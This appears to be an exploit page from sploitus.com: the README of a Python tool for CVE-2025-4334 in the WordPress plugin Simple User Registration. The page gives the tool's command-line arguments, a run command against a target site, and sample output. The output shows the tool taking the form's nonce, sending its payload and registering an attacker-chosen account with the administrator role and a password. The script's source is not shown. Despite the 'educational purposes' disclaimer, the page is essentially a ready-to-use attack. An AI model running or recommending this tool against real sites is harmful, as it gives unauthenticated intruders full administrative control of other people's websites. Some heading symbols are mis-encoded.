## https://sploitus.com/exploit?id=6B223B9E-1BCC-5F2C-AA56-7E6507045974
# CVE-2025-4334 - Simple User Registration --form
```
**Arguments:**
* `-u / --url` β Base WordPress URL (e.g. `https://target.com/wordpress/`)
* `--form` β Full URL of the registration form (e.g. `https://target.com/wpr/default-registration/`)
**Example:**
```bash
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
```
---
## π Sample Output
```
[*] Fetching form details...
[i] Extracted Nonce : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response : {"success":true,"user_id":2}
[+] Exploitation Successful
[+] Username : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name : 0xgh057r3c0nadmin
[+] Email : test@admin.com
[+] Password : Wiz007@8876@
[+] Role : administrator
Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
```
---
## β οΈ Disclaimer
This tool is provided for **educational and research purposes only**.
Unauthorized use against systems without permission is illegal.
The author takes **no responsibility** for misuse.
---
## π License
This project is licensed under the [MIT License](LICENSE).